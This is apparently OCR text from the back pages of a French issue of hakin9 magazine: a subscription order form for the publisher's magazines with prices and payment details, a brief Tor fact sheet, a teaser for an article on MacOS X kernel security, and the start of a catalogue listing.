Nous vous garantissons :
• des tarifs préférentiels,
• un paiement en ligne sécurisé,
• la prise en compte rapide de votre commande.
Abonnement en ligne sécurisé à tous les magazines de la maison d’édition Software !
bulletin d’abonnement
Merci de remplir ce bon de commande et de nous le retourner par fax : 0048 22 860 17 71 ou par courrier :
Software-Wydawnictwo Sp. z o.o., Lewartowskiego 6, 00-190 Varsovie, Pologne ; Tél. 0048 22 860 17 68 ;
E-mail : abonnement@software.com.pl
Adresse .................................................................................................................................................................................................................................
Nombre de Nombre
Titre
À partir du
numéros d’abonne- Prix
numéro
annuels ments
Software Developer’s Journal (1 CD)
– anciennement Software 2.0 12 54 €
Mensuel pour les programmeurs professionnels
Software Developer’s Journal Extra! (1 CD)
– anciennement Software 2.0 Extra! 6 38 €
Hors-série du magazine Software Developer’s Journal
Linux+DVD (2 DVDs) 12 86 €
Mensuel unique avec 2 DVDs consacré à Linux et à ses utilisateurs
.PSD (2 CDs) 6 39 €
Bimestriel pour les utilisateurs d’Adobe Photoshop
Total
Je règle par :
¨ Carte bancaire n° CB expire le date et signature obligatoires
type de carte .......................................................................... code CVC/CVV
¨ Virement bancaire :
Nom banque : Société Générale Chasse/Rhône
banque guichet numéro de compte clé Rib
30003 01353 00028010183 90
IBAN : FR76 30003 01353 00028010183 90
Adresse Swift (Code BIC) : SOGEFRPP
Tor
Système : Windows, MacOS X, *NIX
Licence : Basée sur la licence BSD
But : Proxy SOCKS anonyme
Fiche technique
Page d'accueil : http://tor.eff.org/
MacOS X – sécurité
du kernel
Malgré la participation modeste du
système d’exploitation MacOS X
sur le marché, celui-ci est très
populaire dans certains domaines.
Le systeme est géré par un noyau
moderne basé sur le microkernel
Mach et en partie sur FreeBSD.
Il s’avère cependant que cette
solution n’est pas dépourvue de
défauts. Ilja van Sprundel vous
décrit les points faibles du système
conçu par la société Apple.
dés >>>
Sites recomman
Vous trouverez les informations les plus
récentes sur le marché des logiciels
dans les
Catalogues de hakin9
Sujets des catalogues contenant des articles publicitaires pour le
magazine hakin9 :
N° Sujets du catalogue